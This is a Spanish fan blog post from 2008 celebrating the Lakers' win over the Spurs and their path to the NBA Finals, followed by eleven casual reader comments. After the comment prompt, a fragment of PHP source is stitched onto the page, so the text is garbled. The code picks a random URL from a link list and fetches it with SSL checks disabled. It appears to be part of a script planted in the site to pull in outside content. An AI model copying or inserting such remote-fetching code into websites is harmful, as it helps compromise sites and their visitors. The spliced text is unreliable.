Diario Laker: El comienzo de algo grande

30 de May de 2008 por MagicJohnson32

Pensamientos desde el 1.111 de South Figueroa Street, antiguo 3.900 de West Manchester Boulevard.

Los Lakers ya están en las Finales de la NBA. Sobre el partido ya lo sabréis casi todo, no hace falta que os lo cuente, y el duro trabajo de ser analítico se lo dejo al compañero TheDeerHunter. Yo, ahora que acaban las Finales de Conferencia, prefiero hablar de algo que ha comenzado: la ascensión de estos Lakers. Lo que no sé -y espero tardar mucho en saberlo- es hasta dónde llegará este equipo, que está completando unos Playoffs memorables, en los que acumula 12 victorias y 3 derrotas, pese a que en la banda, de paisano, está desde el pasado enero el chaval de la foto. Porque hay que recordar que con ese chaval de la foto sano los Lakers eran líderes de la Conferencia Oeste.

bynuminjured

Resumiendo: los Lakers, sin su pívot titular, han ganado 4-1 a los Spurs, todavía vigentes campeones de la NBA y el perenne equipo a batir durante la última década. De lo que sean capaces de hacer unos Lakers al completo, de lo que dé de sí la pareja Gasol-Bynum, de todo eso ya tendremos tiempo de hablar cuando finalmente tengamos la oportunidad de comprobarlo. Sin embargo, la sola perspectiva de que este equipo tiene mucho todavía por ofrecer resulta sensacional. Es el comienzo de algo grande. Es, como anoche, poco antes del inicio del 5º partido entre Lakers y Spurs, cantaba en el Primavera Sound la maravillosa vocalista de Portishead, Beth Gibbons… “This is the beginng of forever”.

Hoy, al margen de todos y cada uno de los jugadores que han hecho posible esta memorable temporada, creo que es una gran ocasión para dedicar unas palabras a Mitch Kupchack. Hizo cosas mal y es evidente que ha hecho cosas bien. El tiempo, los resultados, el partido de anoche se han encargado de darle la razón, y es de justicia reconocérselo.

mitchwest

Comenta

11 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Magic… para que luego no digan, toca tirón de orejas.

    No es el momento de hablar de ningún futuro, porque el futuro no existe.
    Es el momento de hablar del presente y de apretar para que esta noche gane Detroit. Después hablaremos de cómo ganar al rival de turno y de cómo birlarle el factor cancha.

    Muy bonito, muy bien el panorama…
    Pero los Lakers son el equipo más perdedor de la historia de la NBA (aunque también el segundo más ganador) Hay que cerrar esto como mandan los cánones.
    Las finales no se juegan, se ganan.

      Citar

  2. MagicJohnson32 dice:
    #2

    Es que en “el comienzo de algo grande”, la primera parada son las Finales.

    Por cierto, que ya anticipé aquí el 4-1 😀

      Citar

  3. Noelinho dice:
    #3

    Porqué no ponemos el fondo del blog amarillo?

      Citar

  4. TheDeerHunter dice:
    #4

    No es ningún secreto que aquí hay un cierto número de miembros (viriles) leales a L.A. (vamos que alguien que se pone de Nick MagicJohnson32 no creo yo que sea muy de Celtics, por poner un ejemplo) pero no es menos cierto que más o menos hay el mismo número de No-Lakerianos (rarunos ellos)

    Independientemente de eso, ahora mismo por motivos evidentes, aproximadamente el 50% de toda la atención a la liga, la absorven Los Lakers… guste o no.
    Diría que aquí en España debería ser bastante más.

    En vuestra mano está equilibrar la balanza con artículos/opiniones con otros equipos de contenido.

      Citar

  5. TheDeerHunter dice:
    #5

    en cualquier caso, a mí sí me molaría el fondo más amarilloncete… que sois unos blancos
    😀

      Citar

  6. MagicJohnson32 dice:
    #6

    ¿Puede ser amarillo con ribetes morados?

      Citar

  7. Noelinho dice:
    #7

    si lo decía en coña hombre ;p

      Citar

  8. TheDeerHunter dice:
    #8

    Aprechemos el tirón del partido de anoche…

    A LA HOGUERA CON ÉL

      Citar

  9. telekoman dice:
    #9

    Desde las huestes azules, blancas y rojas se intenta hacer resistencia a la fiebre amarilla, pero el problema es el tiempo……..

      Citar

  10. TheDeerHunter dice:
    #10

    Si hicieras como Fisher la otra vez no necesitarías ni un segundo para tumbarnos.
    Obviamente como mucho llegas a Billups.

      Citar

  11. Gallis dice:
    #11

    Uffff, no puedo esperar a que empiece la final…

    Necesito seguir viendo jugar al baloncesto a esta gente…

    Que gozada!!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>